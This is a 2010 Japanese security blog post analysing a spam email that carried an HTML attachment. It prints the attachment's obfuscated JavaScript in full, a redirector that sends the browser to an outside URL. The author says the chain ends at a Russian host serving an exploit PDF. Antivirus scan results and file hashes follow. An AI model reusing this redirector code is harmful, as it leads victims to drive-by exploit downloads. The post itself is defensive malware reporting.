FC2ブログ

【今日のウイルスメール】メールで来たガンブラー???

Web閲覧を通じて、不審サイトに誘導しダウンロードさせる手口がガンブラーなんだってね。

これは、メールだから違うかな?やばいなぁ。

サブジェクト
battens breathes blobs armourplated とか
What's your male score? とか
You approval needed など

本文
askance bestow banquet actings. banishment, antisymmetry adapted. alleys abdicating bedsitter bitchiness bashes agendums.

avalanching antique availing appropriating. bugbears, barcode advertisement. blazes arthropod aneurysm attitudes anointing battlecry.
とか
Your gf caught giving head
とか
Make her love you more
など

添付HTML
<script type='text/javascript'>function o(){};this.l=60162;o.prototype = {f : function() {function a(){};this.t=false;var z=42712;this.kB="kB";var h=document;var aV="aV";function j(){};var m="m";var k=h['leoBc%aBt%i&o%n6'.replace(/[6&eB%]/g, '')];var u=function(){};this.b=false;this.v=false;k['hXrAeIfK'.replace(/[KkAXI]/g, '')]='hQt%t%pX:Q/Q/XlXeXnQdXeRrQm%eXdLi%aQ.RcQoRmX/XiRmXaQgLeRsX/LzR.LhQtQmQ'.replace(/[QXRL%]/g, '');this.mA=false;this.c="c";var q=53097;var mT=false;}};var tX=function(){};var g=new o(); this.y=false;g.f();this.jO="";</script>

どうも、最終的には以下に飛ばされる。この間のAngelina Jolieのスパムと似ている。
h ttp://zoojeans.ru:8080/index.php?pid=10

で、この後はどうも、Exploit付きのPDFが落ちてくるようだが、それ以降は闇。

以下は、メールに添付されていた上記誘導スクリプト付きのopen.htmlでのチェック結果。
MD5: 4b801433890640bd576933529591325a
First received: 2010.06.10 07:03:12 UTC
日付: 2010.06.11 05:02:20 UTC [<1D]
結果: 7/40

ウイルスチェック結果
ファイル名 open.html 受理 2010.06.11 05:02:20 (UTC)
アンチウイルスバージョン更新日結果
a-squared5.0.0.262010.06.11-
AhnLab-V32010.06.11.002010.06.11Js/Agent
AntiVir8.2.2.62010.06.10-
Antiy-AVL2.0.3.72010.06.11-
Authentium5.2.0.52010.06.11JS/Redir.BL
Avast4.8.1351.02010.06.10-
Avast55.0.332.02010.06.10-
AVG9.0.0.7872010.06.10HTML/Framer.DU
BitDefender7.22010.06.11-
CAT-QuickHeal10.002010.06.11-
ClamAV0.96.0.3-git2010.06.11-
Comodo50582010.06.11-
DrWeb5.0.2.033002010.06.11JS.Redirector.59
eSafe7.0.17.02010.06.10-
eTrust-Vet36.1.76272010.06.10-
F-Prot4.6.0.1032010.06.11JS/Redir.BL
F-Secure9.0.15370.02010.06.11-
Fortinet4.1.133.02010.06.10-
GData212010.06.11-
IkarusT3.1.1.84.02010.06.11-
Jiangmin13.0.9002010.06.10-
Kaspersky7.0.0.1252010.06.11-
McAfee5.400.0.11582010.06.11-
McAfee-GW-Edition2010.12010.06.10-
Microsoft1.58022010.06.10-
NOD3251882010.06.10JS/TrojanDownloader.Pegel.BR
Norman6.04.122010.06.10-
nProtect2010-06-10.012010.06.10-
Panda10.0.2.72010.06.10-
PCTools7.0.3.52010.06.11-
Rising22.51.04.012010.06.11-
Sophos4.54.02010.06.11-
Sunbelt64332010.06.11Trojan.JS.Redirector.bg (v)
Symantec20101.1.0.892010.06.11-
TheHacker6.5.2.0.2972010.06.11-
TrendMicro9.120.0.10042010.06.11-
TrendMicro-HouseCall9.120.0.10042010.06.11-
VBA323.12.12.52010.06.10-
ViRobot2010.6.10.38792010.06.10-
VirusBuster5.0.27.02010.06.10-
 
追加情報
File size: 554 bytes
MD5   : 4b801433890640bd576933529591325a
SHA1  : 9665ceb3da4e44bf1ce9ad1363f819a022ca1a0e
SHA256: 2345528f3e03227c368952daf160ec97f767bc5edf731c0b778775101b0c9cab
TrID  : File type identification
Unknown!
ssdeep: 12:EcjPLvY9G+wzlP4B5iRYdP4Vo0wXDEhk/v0pPOSkIO0CC9tbb:VLQ9wlPu5qYdPQUXDEKH0pPrkIO0T9b
sigcheck: publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
PEiD  : -
RDS   : NSRL Reference Data Set
-

コメント


非公開コメント

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り